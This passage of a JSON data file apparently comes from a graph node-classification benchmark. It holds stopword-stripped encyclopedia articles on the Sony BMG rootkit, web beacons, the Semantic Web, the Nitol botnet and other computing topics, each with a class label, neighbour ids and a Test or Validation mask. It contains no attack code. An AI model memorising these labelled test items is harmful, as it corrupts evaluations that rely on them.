x systems user presented eula regardless whether user accepted however mac os x prompted user confirmation software attempted modify os whereas computers running windows scandal erupted october 31 2005 winternals later acquired microsoft corporation researcher mark russinovich posted blog detailed description technical analysis f4i xcp software ascertained recently installed computer sony bmg music cd russinovich compared software rootkit due surreptitious installation efforts hide existence noted eula mention software asserted emphatically software illegitimate digital rights management gone far anti-virus firm f-secure concurred although software n't directly malicious used rootkit hiding techniques exactly used malicious software hide drm software cause many similar false alarms av software detect rootkits ... thus inappropriate commercial software use techniques public pressure symantec anti-virus vendors included detection rootkit products well microsoft announced would include detection removal capabilities security patches russinovich discovered numerous problems xcp soon russinovich first post several trojans worms exploiting xcp security holes people even used vulnerabilities cheat online games sony bmg quickly released software remove rootkit component xcp affected microsoft windows computers russinovich analyzed utility reported blog exacerbated security problems raised concerns privacy russinovich noted removal program merely unmasked hidden files installed rootkit actually remove rootkit also reported installed additional software could uninstalled order download uninstaller found necessary provide e-mail address sony bmg privacy policy implied added various bulk e-mail lists install activex control containing backdoor methods marked safe scripting thus prone exploits november 18 2005 sony bmg provided new improved removal tool remove rootkit component xcp affected microsoft windows computers november 15 2005 vnunet.com announced sony bmg backing copy-protection software recalling unsold cds stores offering consumers exchange cds versions lacking software electronic frontier foundation compiled partial list cds xcp sony bmg quoted maintaining security risks associated anti-piracy technology despite numerous virus malware reports november 16 2005 us-cert part united states department homeland security issued advisory xcp drm said xcp uses rootkit technology hide certain files computer user technique security threat computer users also said one uninstallation options provided sony bmg introduces vulnerabilities system us-cert advised install software sources expect contain software audio cd sony bmg announced instructed retailers remove unsold music discs containing software shelves estimated internet security expert dan kaminsky xcp use 500,000 networks cds xcp technology identified letters xcp printed back cover jewel case cd according sonybmg xcp faq november 18 2005 reuters reported sony bmg would exchange affected insecure cds new unprotected disks well unprotected mp3 files information swap found sony bmg swap program website part swap program consumers mail xcp-protected cds sony bmg sent unprotected disc via return mail november 29 new york attorney general eliot spitzer found investigators despite recall november 15 sony bmg cds xcp still sale new york city music retail outlets spitzer said unacceptable three weeks serious vulnerability revealed cds still shelves busiest shopping days year strongly urge retailers heed warnings issued products pull distribution immediately ship back sony next day massachusetts attorney general tom reilly issued statement saying sony bmg cds xcp still available boston despite sony bmg recall november 15 attorney general reilly advised consumers purchase sony bmg cds xcp said conducting investigation sony bmg may 11 2006 sony bmg website offered consumers link class action settlement information regarding xcp mediamax content protection online claim filing links software updates/uninstallers deadline submitting claim june 30 2007 april 2 2008 sony bmg website finally offered consumers explanation list affected cds november 21 2005 texas attorney general greg abbott sued sony bmg texas first state united states bring legal action sony bmg response rootkit suit also first filed state ’ 2005 spyware law alleged company surreptitiously installed spyware millions compact music discs cds consumers inserted computers play cds compromise systems december 21 2005 abbott added new allegations lawsuit sony-bmg regarding mediamax new allegations claimed mediamax violated state spyware deceptive trade practices laws mediamax software would installed computer even user declined license agreement would authorize installation abbott stated keep discovering additional methods sony used deceive texas consumers thought simply buying music thousands texans potential victims deceptive game sony played consumers purposes addition violations consumer protection computer spyware act 2005 allowed civil penalties 100,000 violation law alleged violations added updated lawsuit december 21 2005 carried maximum penalties 20,000 per violation sony lost battle abbott pay 750,000 legal fees texas accept customer returns affected cds place conspicuous detailed notice homepage make keyword buys alert consumers advertising google yahoo msn pay 150 per damaged computer much sony bmg also agree would make claim legal settlement way constitutes approval court class action suits filed sony bmg new york california december 30 2005 new york times reported sony bmg reached tentative settlement lawsuits proposing two ways compensating consumers purchased affected recordings according proposed settlement purchased xcp cd paid 7.50 per purchased recording given opportunity download free album able download three additional albums limited list recordings give cash incentive district judge naomi reice buchwald entered order tentatively approving settlement january 6 2006 settlement designed compensate whose computers infected otherwise damaged damages addressed class action able opt settlement pursue litigation fairness hearing held may 22 2006 9:15 daniel patrick moynihan united states courthouse southern district new york claims submitted december 31 2006 class members wished excluded settlement must filed may 1 2006 remained settlement could attend fairness hearing expense speak behalf represented attorney italy alcei association similar eff also reported rootkit financial police asking investigation various computer crime allegations along technical analysis rootkit us department justice doj made comment whether would take criminal action sony however stewart baker department homeland security publicly admonished sony stating intellectual property—it computer november 21 eff announced also pursuing lawsuit xcp sunncomm mediamax drm technology eff lawsuit also involves issues concerning sony bmg end user license agreement reported december 24 2005 then-florida attorney general charlie crist investigating sony bmg spyware january 30 2007 u.s. federal trade commission ftc announced settlement sony bmg charges cd copy protection violated federal law—section 5 federal trade commission act 15 usc 45 —by engaging unfair deceptive business practices settlement requires sony bmg reimburse consumers 150 repair damage resulted directly attempts remove software installed without consent settlement also requires provide clear prominent disclosure packaging future cds limits copying restrictions use playback devices ban company installing content protection software without obtaining consumers ’ authorization ftc chairwoman deborah platt majoras added installations secret software create security risks intrusive unlawful consumers computers belong companies must adequately disclose unexpected limitations customer use products consumers make informed decisions regarding whether purchase install content researchers found sony bmg makers xcp also apparently infringed copyright failing adhere licensing requirements various pieces free open-source software whose code used program including lame mp3 encoder mpglib faac id3lib mpg123 vlc media player january 2006 developers lame posted open letter stating expected appropriate action sony bmg developers plans investigate take action apparent violation lame source code license russinovich report discussed popular blogs almost immediately following release npr one first major news outlets report scandal november 4 2005 thomas hesse sony bmg global digital business president told reporter neda ulaby people think n't even know rootkit care november 7 2005 article vnunet.com summarised russinovich findings urged consumers avoid buying sony bmg music cds time following day boston globe classified software spyware computer associates etrust security management unit vp steve curry confirmed communicates personal information consumers computers sony bmg namely cd played user ip address methods used software avoid detection likened used data thieves november 8 2005 computer associates decided classify sony bmg software spyware provide tools removal speaking sony bmg suspending use xcp independent researcher mark russinovich said step taken immediately first virus made use sony bmg stealth technology make malicious files invisible user anti-virus programs surfaced november 10 2005 one day later yahoo news announced sony bmg suspended distribution controversial technology according zdnet news latest risk uninstaller program distributed sunncomm technologies company provides copy protection sony bmg releases uninstall program obeys commands sent allowing others take control pcs uninstaller used december 6 2005 sony bmg said 5.7 million cds spanning 27 titles shipped mediamax 5 software company announced availability new software patch prevent potential security breach consumers computers sony bmg australia released press release indicating sony bmg titles manufactured australia copy protection",
    "neighbors": [
      2309,
      11,
      268,
      6797,
      7957,
      1046,
      10392,
      3867,
      10026,
      7739,
      9791,
      9537,
      3525,
      839,
      7515,
      3163,
      8797,
      9569,
      4081,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 10449,
    "label": 3,
    "text": "Wizardry_II:_The_Knight_of_Diamonds:wizardry ii knight diamonds wizardry ii knight diamonds originally known wizardry knight diamonds second scenario second game wizardry series role-playing video games published 1982 sir-tech game begins city llylgamyn siege llylgamyn rulers killed city hope recovery staff gnilda obtainable trading mystic knight diamonds armor legendary knight diamonds fend invaders game functions virtually identically first scenario player guiding party six adventurers 6 level dungeon original version required players import characters first game whilst later versions include pregenerated party ability create new characters game intended played successfully completed first game difficulty level intended characters least level 13 training area means lower level characters go baptism fire mechanical differences include ability save game dungeon rather forcing characters exit dungeon return training grounds spells increasing power noted message dungeon unlike first scenario half levels purpose plot-wise could skipped player wished exploration levels knight diamonds necessary complete game six levels piece knight armor somewhere level pieces must collected order finish game furthermore unlike first scenario elevators used skip levels teleportation spells fail party attempts use teleport level yet reached via stairs softline 1982 praised knight diamonds variety monsters liked level dungeon quests magazine concluded one wonder amazing duo greenberg woodhead next scenario computer gaming world 1991 1993 called wizardry ii disappointingly weak follow-up criticizing small size noting first game necessary play magazine concluded best hard-core fan philip l. wing reviewed knight diamonds space gamer 76 wing commented recommend scenario interesting challenging adventure higher-level wizardry characters knight diamonds named best adventure game home computer 1982 origins game fair defeating ultima ii among nominees also received certificate merit category 1984 best computer adventure 5th annual arkie awards",
    "neighbors": [
      9446,
      5260,
      4533,
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 10450,
    "label": 8,
    "text": "Web_beacon:web beacon web beacon also called web bug tracking bug tag web tag page tag tracking pixel pixel tag 1×1 gif clear gif one various techniques used web pages email unobtrusively usually invisibly allow checking user accessed content web beacons typically used third parties monitor activity users website purpose web analytics page tagging also used email tracking implemented using javascript may called javascript tags using beacons companies organizations track online behavior web users first companies tracking mainly advertisers web analytics companies later social media sites also started use tracking techniques instance use buttons act tracking beacons work progress standardize interface web developers use create web beacons web beacon number techniques used track visiting web page also used see email read forwarded web page copied another website first web beacons small digital image files embedded web page email image could small single pixel could color background completely transparent thus name “ tracking pixel ” user opens page email image embedded might see image web browser email reader would automatically download image requiring user ’ computer send request host company ’ server source image stored request would provide identifying information computer allowing host keep track user basic technique developed sorts elements used beacons currently include visible elements graphics banners buttons also non-pictorial html elements frame style script input link embed object etc. email web page identifying information provided user computer typically includes ip address time request made type web browser email reader made request existence cookies previously sent host server host server store information associate session identifier tracking token uniquely marks interaction use framing added new level versatility web beacons framing allows web pages refer content images buttons html elements located servers rather hosting content directly server user sees email web page user ’ email reader web browser prepares referred content display send request third-party server ask send referred content part request user computer supply identifying information third-party server protocol allows companies embed beacons content directly operate use beacons tracking purposes beacons embedded email web page images buttons html elements hosted different server website embedded third-party server requests identifying information sent instance case advertisement displayed image web page image file would reside page ’ host server server belonging advertising company user opens page user computer request download advertisement page ’ server referred advertiser server request download image advertiser server request require user computer supply identifying information advertiser means third-party site advertiser gather information visitors main site news site social media site even users clicking advertisement moreover given beacons embedded visible advertisements embedded completely invisible elements third party gather information even user completely unaware third party ’ existence company identify particular user company track user behavior across multiple interactions different websites web servers example consider company owns network websites company could store images one particular server store contents web pages variety servers instance server could specific given website could even located different city company could use web beacons count recognize individual users visit different websites rather gathering statistics managing cookies server independently company analyze data together track behavior individual users across different websites assembling profile user navigates different environments web beacons embedded emails greater privacy implications beacons embedded web pages use embedded beacon sender email even third party record sort information advertiser website namely time email read ip address computer used read email ip address proxy server reader went type software used read email existence cookies previously sent way sender third party gather detailed information particular recipient reads email every subsequent time email message displayed information also sent sender third party return-receipt-to rrt email headers also trigger sending information may seen another form web beacon web beacons used email marketers spammers phishers verify email read using system send similar emails large number addresses check ones valid valid case means address actually use email made past spam filters content email actually viewed extent kind email tracking prevented configuring email reader software avoid accessing remote images examples email software able include gmail yahoo hushmail spamcop/horde webmail clients mozilla thunderbird opera pegasus mail incredimail apple mail later versions microsoft outlook kmail mail readers however since beacons embedded email non-pictorial elements email need contain image advertisement anything else related identity monitoring party makes detection emails difficult one way neutralize email tracking disconnect internet downloading email reading downloaded messages note assumes one using email reader resides one ’ computer downloads emails email server one ’ computer case messages containing beacons able trigger requests beacons host servers tracking prevented one would delete messages suspected containing beacons risk beacons activate computer reconnected internet way completely avoid email tracking beacons use text-based email reader pine mutt graphical email reader purely text-based html capabilities mulberry email readers interpret html display images users subject tracking email web beacons plain-text email messages contain web beacons contents interpreted display characters instead embedded html code opening messages initiate communication email readers offer option disable html every message thus rendering messages plain text prevent tracking beacons working recently many email readers web-based email services moved towards loading images opening hypertext email comes unknown sender suspected spam email user must explicitly choose load images course beacons embedded non-pictorial elements hypertext email web beacons also filtered server level never reach end user mailscanner example gateway software neutralize email tracking beacons users particular server beacon api application programming interface candidate recommendation world wide web consortium standards organization web standardized set protocols designed allow web developers track activity users without slowing website response times sending tracking information back beacon host server user navigated away webpage use beacon api allows tracking without interfering delaying navigation away site invisible end-user support beacon api introduced mozilla firefox browser february 2014 google chrome browser november 2014",
    "neighbors": [
      1667,
      3462,
      8584,
      1419,
      5524,
      11418,
      7965,
      8735,
      3490,
      297,
      9642,
      6576,
      845,
      6094,
      10579,
      1514,
      235,
      9451,
      4725,
      3578,
      124
    ],
    "mask": "None"
  },
  {
    "node_id": 10451,
    "label": 2,
    "text": "List_of_router_firmware_projects:list router firmware projects list software created maintained people manufacturer product extent support testing particular hardware varies project project notable custom-firmware projects wireless routers many run various brands linksys asus netgear etc software distributions routers 5 gb storage 1 gb ram",
    "neighbors": [
      1792,
      2049,
      4480,
      2179,
      4611,
      2825,
      1802,
      6797,
      1172,
      1814,
      8214,
      9496,
      3482,
      1436,
      4511,
      6431,
      5924,
      550,
      8998,
      9640,
      10790,
      7082,
      1708,
      3885,
      686,
      7983,
      9004,
      8753,
      9009,
      823,
      569,
      5178,
      11577,
      3007,
      9279,
      5057,
      1858,
      10303,
      10433,
      11073,
      2118,
      5959,
      9927,
      5322,
      5067,
      4814,
      7887,
      9423,
      7121,
      10574,
      11086,
      10708,
      4568,
      9048,
      1754,
      2907,
      5978,
      6364,
      5860,
      3942,
      8943,
      8816,
      1138,
      9971,
      4214,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10452,
    "label": 8,
    "text": "Semantic_Web:semantic web semantic web extension world wide web standards world wide web consortium w3c standards promote common data formats exchange protocols web fundamentally resource description framework rdf according w3c semantic web provides common framework allows data shared reused across application enterprise community boundaries semantic web therefore regarded integrator across different content information applications systems term coined tim berners-lee web data data web processed machines—that one much meaning machine-readable critics questioned feasibility proponents argue applications library information science industry biology human sciences research already proven validity original concept berners-lee originally expressed vision semantic web follows 2001 scientific american article berners-lee hendler lassila described expected evolution existing web semantic web 2006 berners-lee colleagues stated simple idea…remains largely unrealized 2013 four million web domains contained semantic web markup following example text 'paul schuster born dresden website annotated connecting person place birth following html-fragment shows small graph described rdfa-syntax using schema.org vocabulary wikidata id div vocab= http //schema.org/ typeof= person /div example defines following five triples shown turtle syntax triple represents one edge resulting graph first element triple subject name node edge starts second element predicate type edge last third element object either name node edge ends literal value e.g text number etc. triples result graph shown given figure one advantages using uniform resource identifiers uris dereferenced using http protocol according so-called linked open data principles dereferenced uri result document offers data given uri example uris edges nodes e.g nowiki http //schema.org/person /nowiki nowiki http //schema.org/birthplace /nowiki nowiki http //www.wikidata.org/entity/q1731 /nowiki dereferenced result rdf graphs describing uri e.g dresden city germany person sense uri fictional second graph shows previous example enriched triples documents result dereferencing nowiki http //schema.org/person /nowiki green edge nowiki http //www.wikidata.org/entity/q1731 /nowiki blue edges additionally edges given involved documents explicitly edges automatically inferred triple original rdfa fragment triple document nowiki http //schema.org/person /nowiki green edge figure allow infer following triple given owl semantics red dashed line second figure concept semantic network model formed early 1960s researchers cognitive scientist allan m. collins linguist m. ross quillian psychologist elizabeth f. loftus form represent semantically structured knowledge applied context modern internet extends network hyperlinked human-readable web pages inserting machine-readable metadata pages related enables automated agents access web intelligently perform tasks behalf users term semantic web coined tim berners-lee inventor world wide web director world wide web consortium w3c oversees development proposed semantic web standards defines semantic web web data processed directly indirectly machines many technologies proposed w3c already existed positioned w3c umbrella used various contexts particularly dealing information encompasses limited defined domain sharing data common necessity scientific research data exchange among businesses addition technologies similar goals emerged microformats many files typical computer also loosely divided human-readable documents machine-readable data documents like mail messages reports brochures read humans data calendars addressbooks playlists spreadsheets presented using application program lets viewed searched combined currently world wide web based mainly documents written hypertext markup language html markup convention used coding body text interspersed multimedia objects images interactive forms metadata tags provide method computers categorize content web pages examples field names keywords description author assigned values computing cheap widgets sale john doe metadata tagging categorization computer systems want access share data easily identify relevant values html tool render perhaps web browser software perhaps another user agent one create present page lists items sale html catalog page make simple document-level assertions document title 'widget superstore capability within html assert unambiguously example item number x586172 acme gizmo retail price €199 consumer product rather html say span text x586172 something positioned near acme gizmo €199 etc way say catalog even establish acme gizmo kind title €199 price also way express pieces information bound together describing discrete item distinct items perhaps listed page semantic html refers traditional html practice markup following intention rather specifying layout details directly example use denoting emphasis rather specifies italics layout details left browser combination cascading style sheets practice falls short specifying semantics objects items sale prices microformats extend html syntax create machine-readable semantic markup objects including people organisations events products similar initiatives include rdfa microdata schema.org semantic web takes solution involves publishing languages specifically designed data resource description framework rdf web ontology language owl extensible markup language xml html describes documents links rdf owl xml contrast describe arbitrary things people meetings airplane parts technologies combined order provide descriptions supplement replace content web documents thus content may manifest descriptive data stored web-accessible databases markup within documents particularly extensible html xhtml interspersed xml often purely xml layout rendering cues stored separately machine-readable descriptions enable content managers add meaning content i.e. describe structure knowledge content way machine process knowledge instead text using processes similar human deductive reasoning inference thereby obtaining meaningful results helping computers perform automated information gathering research example tag would used non-semantic web page encoding similar information semantic web page might look like tim berners-lee calls resulting network linked data giant global graph contrast html-based world wide web berners-lee posits past document sharing future data sharing answer question provides three points instruction one url point data two anyone accessing url get data back three relationships data point additional urls data tim berners-lee described semantic web component web 3.0 semantic web sometimes used synonym web 3.0 though definition term varies web 3.0 started emerge movement away centralisation services like search social media chat applications dependent single organisation function guardian journalist john harris reviewed concept favorably early2019 particular work bernerslee project called 'solid based around personal data stores 'pods individuals retain control bernerslee formed startup inrupt advance idea attract volunteer developers challenges semantic web include vastness vagueness uncertainty inconsistency deceit automated reasoning systems deal issues order deliver promise semantic web list challenges illustrative rather exhaustive focuses challenges unifying logic proof layers semantic web world wide web consortium w3c incubator group uncertainty reasoning world wide web urw3-xg final report lumps problems together single heading uncertainty many techniques mentioned require extensions web ontology language owl example annotate conditional probabilities area active research standardization semantic web context web 3.0 care w3c term semantic web often used specifically refer formats technologies enable collection structuring recovery linked data enabled technologies provide formal description concepts terms relationships within given knowledge domain technologies specified w3c standards include semantic web stack illustrates architecture semantic web functions relationships components summarized follows well-established standards yet fully realized intent enhance usability usefulness web interconnected resources creating semantic web services services could useful public search engines could used knowledge management within organization business applications include corporation closed group users management able enforce company guidelines like adoption specific ontologies use semantic annotation compared public semantic web lesser requirements scalability information circulating within company trusted general privacy less issue outside handling customer data critics question basic feasibility complete even partial fulfillment semantic web pointing difficulties setting lack general-purpose usefulness prevents required effort invested 2003 paper marshall shipman point cognitive overhead inherent formalizing knowledge compared authoring traditional web hypertext according marshall shipman tacit changing nature much knowledge adds knowledge engineering problem limits semantic web applicability specific domains issue point domain- organisation-specific ways express knowledge must solved community agreement rather technical means turns specialized communities organizations intra-company projects tended adopt semantic web technologies greater peripheral less-specialized communities practical constraints toward adoption appeared less challenging domain scope limited general public world-wide web finally marshall shipman see pragmatic problems idea knowledge navigator-style intelligent agents working largely manually curated semantic web cory doctorow critique metacrap perspective human behavior personal preferences example people may include spurious metadata web pages attempt mislead semantic web engines naively assume metadata veracity phenomenon well-known metatags fooled altavista ranking algorithm elevating ranking certain web pages google indexing engine specifically looks attempts manipulation peter gärdenfors timo honkela point logic-based semantic web technologies cover fraction relevant phenomena related semantics enthusiasm semantic web could tempered concerns regarding censorship privacy instance text-analyzing techniques easily bypassed using words metaphors instance using images place words advanced implementation semantic web would make much easier governments control viewing creation online information information would much easier automated content-blocking machine understand addition issue also raised use foaf files geolocation meta-data would little anonymity associated authorship articles things personal blog concerns addressed policy aware web project active research development topic another criticism semantic web would much time-consuming create publish content would need two formats one piece data one human viewing one machines however many web applications development addressing issue creating machine-readable format upon publishing data request machine data development microformats one reaction kind criticism another argument defense feasibility semantic web likely falling price human intelligence tasks digital labor markets amazon mechanical turk specifications erdf rdfa allow arbitrary rdf data embedded html pages grddl gleaning resource descriptions dialects language mechanism allows existing material including microformats automatically interpreted rdf publishers need use single format html first research group explicitly focusing corporate semantic web acacia team inria-sophia-antipolis founded 2002 results work include rdf based corese search engine application semantic web technology realm e-learning since 2008 corporate semantic web research group located free university berlin focuses building blocks corporate semantic search corporate semantic collaboration corporate ontology engineering ontology engineering research includes question involve non-expert users creating ontologies semantically annotated content extracting explicit knowledge interaction users within enterprises tim o'reilly coined term web 2.0 proposed long-term vision semantic web web data sophisticated applications manipulate data web data web transforms web distributed file system distributed database system",
    "neighbors": [
      6145,
      2948,
      5641,
      11659,
      8717,
      6798,
      4624,
      11538,
      10004,
      5525,
      534,
      1174,
      11674,
      2715,
      3227,
      9631,
      416,
      1825,
      9248,
      9762,
      5030,
      2471,
      53,
      6330,
      10938,
      3389,
      4797,
      9150,
      3264,
      10557,
      8514,
      6470,
      5319,
      9286,
      1481,
      1737,
      5449,
      7164,
      4557,
      8777,
      11206,
      10577,
      2901,
      9941,
      6745,
      247,
      8923,
      2781,
      479,
      2273,
      3682,
      3811,
      8291,
      6629,
      8421,
      8808,
      1001,
      4713,
      3052,
      11117,
      8046,
      4847,
      7408,
      113,
      3698,
      8688,
      10102,
      119,
      2680,
      7802,
      124,
      3454
    ],
    "mask": "Test"
  },
  {
    "node_id": 10453,
    "label": 1,
    "text": "EXist:exist exist-db exist short open source software project nosql databases built xml technology classified nosql document-oriented database system native xml database provides support xml json html binary documents unlike relational database management systems rdbms nosql databases exist-db provides xquery xslt query application programming languages exist-db released version 2.1 gnu lgpl exist-db created 2000 wolfgang meier major versions released 1.0 september 2006 2.0 february 2013 3.0 february 2017 4.0 february 2018 5.0.0-rc1 june 2018. exist-db awarded best xml database year infoworld 2006 company called exist solutions gmbh germany promotes software.. o'reilly book exist-db co-authored adam retter erik siegel exist-db allows software developers persist xml/json/binary documents without writing extensive middleware exist-db follows extends many w3c xml standards xquery exist-db also supports rest interfaces interfacing ajax-type web forms applications xforms may save data using lines code webdav interface exist-db allows users drag drop xml files directly exist-db database exist-db automatically indexes documents using keyword indexing system exist-db support following standards technologies",
    "neighbors": [
      9828,
      2757,
      1802,
      7983,
      2901,
      502,
      6775,
      2296,
      124,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10454,
    "label": 7,
    "text": "Introhive:introhive introhive customer relationship management crm automation relationship intelligence platform designed help companies drive user adoption crm increase sales business development efficiency introhive platform works connect contact account data email systems crm improve team productivity data accuracy completeness information crm introhive established fredericton new brunswick canada offices chicago miami london u.k. chennai india headquartered washington d.c.. introhive founded january 2012 fredericton jody glidden stewart walchli entrepreneurs previously founded content delivery application company chalk media sold research motion 2009 introhive raised substantial venture funding first year canadian us-based investors early 2013 three former executives salesforce.com joined leadership team today introhive numbers 120+ staff across company 6 global offices introhive developed cloud-based software platform utilizes relationships organization ’ employees customers colleagues friends – including social media email electronic calendars contacts introhive platform assesses well person knows someone else assigning relationship score contact designed particularly large organisations hard quantify mine existing connections among employees platform core enterprise relationship management erm solution integrates crm business systems provide sales force automation relationship intelligence crm relationship analytics solutions platform built sales marketing organisations looking increase user adoption crm increase data quality decrease manual data entry crm increase insights business relationships platform provides organizations holistic view knows across company employees customer relationships data gathered crm distributed users platform via pre-meeting digests include company news meeting attendee profiles meeting notes crm information marketing automation information relationship intelligence stock quotes platform designed create enterprise relationship graph enable introhive refers 'warm introductions rather relying sales marketing cold calls",
    "neighbors": [
      4194,
      467,
      10090
    ],
    "mask": "Test"
  },
  {
    "node_id": 10455,
    "label": 2,
    "text": "Robert_Watson_(computer_scientist):robert watson computer scientist robert nicholas maxwell watson born 3 may 1977 freebsd developer founder trustedbsd project currently employed university lecturer systems security architecture security research group university cambridge computer laboratory watson graduated computer science carnegie mellon university attained phd university cambridge well cambridge worked national institutes health carnegie mellon university trusted information systems network associates mcafee sparta obtained phd computer security university cambridge computer laboratory supervised ross anderson sponsored google watson work supported darpa apple computer navy us government agencies main research interests network security operating system security main open source software contributions include work developing multi-threaded multi-processor freebsd network stack trustedbsd project openbsm writing featured forums acm queue magazine usenix annual technical conference bsdcon slashdot interview also freebsd core team member 2000 2012 watson coauthor standard textbook design implementation freebsd operating system 2nd ed. 2015 marshall kirk mckusick",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      3766,
      9784,
      1465,
      5177,
      5819,
      3006,
      704,
      11459,
      8262,
      9927,
      8266,
      8395,
      9932,
      8909,
      5710,
      6864,
      7249,
      850,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1634,
      1891,
      8671,
      998,
      4073,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      2558,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 10456,
    "label": 0,
    "text": "Margaret_Masterman:margaret masterman margaret masterman 4 may 1910 – 1 april 1986 british linguist philosopher known pioneering work field computational linguistics especially machine translation founded cambridge language research unit margaret masterman born london 4 may 1910 charles f. g. masterman politician lucy blanche lyttelton politician poet writer 1932 married richard bevan braithwaite philosopher son daughter margaret masterman one six students wittgenstein course 1933–34 whose notes compiled blue book 1955 founded directed cambridge language research unit clru grew informal discussion group major research centre computational linguistics time student newnham college cambridge read modern languages moral sciences philosophy called cambridge language research unit founded small beautiful building called adie museum housed far eastern art small buddhist sculptures built walls carved doors period twenty years starting 1953 source significant research machine translation computational linguistics quantum physics even though outside official university structures cambridge funded grants us agencies afosr onr nsf uk government agencies osti later eu funds luxembourg computing facilities primitive—an ancient icl 1202 computer -- -and serious computation done either cambridge university machine mathematical laboratory—or clru visitors sites us one measure impact staff never exceeded ten people annual lifetime achievement awards association computational linguistics us three awarded clru alumni martin kay karen spärck jones yorick wilks margaret masterman ahead time twenty years many beliefs proposals language processing computer become part common stock ideas artificial intelligence ai machine translation mt fields never able lay adequate claim unacceptable published written later students independently “ discovered ” others trace back especially fields little nothing ten years old ever reread core beliefs language processing must reflect coherence language redundancy signal idea partial inheritance old “ information theoretic ” view language meant processes analysing language must take account repetitive redundant structures writer goes saying thing different ways writer ambiguities removed signal sometimes led overemphasise real explicit redundancy would find rhythmical repetitive verse claim implausibly normal english like could see right led later years key role assigned rhythm stress breathgroupings boundaries impose text processes understanding put crudely claim languages way least part produced creatures breathe fairly regular intervals obvious claims could even entertained chomsky views preeminent language studies however could never give systematic surface criteria breathgroups stress patterns identified surface cues could reduced criteria syntax morphology would become involved actual physics voice patterns views importance semantics language processing continued defend high years chomskyan syntax 1951 1966 much influenced r. h. richens views classification description means language semantic primitives syntax along associated claims semantic pattern matching onto surface text developed actual programs might assumed straightforward believer existence semantic primitives katzian schankian sense nothing could truth far much wittgensteinian sceptic ability limited sublanguage logic take role whole language always argued semantic primitives would make sense empirical criteria discovery theory allowed fact would develop exactly polysemy higher natural language always emphasised functional role primitives example resolving sense ambiguity interlingua mt hoped escape problem origin semantic primitives would lie either empirical classification procedures operating actual texts way speak deriving primitives massive connectionist learning adequate formal theory structure thesauri believed make explicit certain underlying structures semantic relations natural language theory “ primitives ” would emerge naturally organizing classification thesauri years colleagues explored lattice theory underlying formal structure thesauri two concerns went intellectual life owe much period michael halliday university lecturer chinese cambridge colleague c.l.r.u got idea syntactic theory fundamentally semantic pragmatic either categories fundamental definition terms role syntax organizing principle semantic information first ai researcher influenced halliday long terry winograd became preoccupied considerable period nature function chinese ideograms felt clarified empirical way problems wittgenstein wrestled so-called picture-theory-of-truth led exaggerate generality ideogrammatic principles seem hold english really rather like chinese seen correctly meaning atoms highly ambiguous virtually uninflected view found little sympathy dominant linguistic computational currents time main creation 1953 one endured twenty years cambridge language research unit grew informal discussion group heterogeneous membership interested language philosophical computational points view subsequently attempt build language processing programs sound philosophical basis distinctive feature unit work approach language processing specific form took use thesaurus main vehicle semantic operations probably come seen unit major contributions field whole margaret primarily responsible vision language processing possibilities remarkable time computers rudimentary indeed much c.l.r.u work done predecessors computers namely hollerith punched card machines equally margaret determination establishing maintaining unit enormous effort fund raising involved striking fact could continue decades periods public support work hard come tribute margaret persistence charm difficult us days artificial intelligence ordinary market place powerful personal computers realise hard get financial resources needed language-processing research technical resources actual experiments perhaps best comment margaret initiative embarking language processing research specifically machine translation work comes somewhat unexpected source machine translation initial period high hopes large claims cast outer darkness 1966 funding agencies saw little return money reviewing twenty five years artificial intelligence research presidential address american association artificial intelligence 1985 woody bledsoe one long-standing leaders field though areas quite outside language said attempted machine translation fifties sixties may failed right try learned much attempts something difficult c.l.r.u trying far ahead time efforts made tackle fundamental problems computers day capacity modern digital wrist watch despite every kind problem unit produced numerous publications language related subjects including information retrieval automatic classification ten years unit presence strongly felt field always emphasis basic semantic problems language understanding margaret time felt needed syntactic parsing complete parsing necessary anything else semantics language regarded basic part understanding machine ideas c.l.r.u seem curiously modern margaret main contribution life clru continual intellectual stimulus gave research larger natural language processing community wide ranging concerns lateral ideas led example propose thesaurus means carrying many distinct language processing tasks like indexing translation margaret emphasis algorithms testing vital development clru work language processing ideas notable especially worked intellectual qualities sheer joyousness serious research stopped clru 1978 margaret tried restart clru 1980 william williams hope new breed micro-computers could used develop algorithms natural language translation margaret walked 7 miles millington road cambridge orwell purchased two north star horizon computers intelligent artefacts see st robotics installed forth programming language written david sands used various students university cambridge programmed margaret algorithms computers margaret approach natural language translation time split sentence breath group segments since breath group unique meaning could translated target language target sentence reconstructed using translated breath groups contrasted predominant language translation techniques time notably systran used dictionary rule based system still used today margaret died 1986 william williams closed clru unique library early mt documents dumped skip even though two university bodies offered give home one cofounders lucy cavendish college first vice-president 1965–1975 great-niece lucy cavendish college named also founder major inspiration epiphany philosophers group shared membership clru dedicated study relationship science religion forms religious practice 1965 margaret masterman read work nature paradigm fourth international colloquium philosophy science london conducted detailed textual criticism thomas s. kuhn book structure scientific revolutions 1962 characterizing book scientifically perspicuous philosophically obscure masterman praised kuhn one outstanding philosophers science time concept paradigms fundamental idea new one philosophy science criticised thomas kuhn vague inconsistent use concept paradigm noting used least 21 different senses summarized three groups metaparadigms sociological paradigms artefact construct paradigms masterman proposed kuhn critics philosophy science dealt metaparadigms explored insights implications various conceptions criticism accepted thomas kuhn crucial shift concept paradigm incommensurability",
    "neighbors": [
      3904,
      1890,
      7724,
      3085,
      3668,
      538,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10457,
    "label": 4,
    "text": "Nitol_botnet:nitol botnet nitol botnet mostly involved spreading malware distributed denial-of-service attacks nitol botnet first discovered around december 2012 analysis botnet indicating botnet mostly prevalent china estimate 85 infections detected china botnet found present systems came brand-new factory indicating trojan installed somewhere assembly manufacturing process according microsoft systems risk also contained counterfeit installation microsoft windows 10 september 2012 microsoft took action nitol botnet obtaining court order subsequently sinkholing 3322.org domain 3322.org domain dynamic dns used botnet creators command control infrastructure controlling botnet microsoft later settled 3322.org operator pen yong allowed latter continue operating domain condition subdomains linked malware remain sinkholed",
    "neighbors": [
      3072,
      10756,
      3724,
      6797,
      3347,
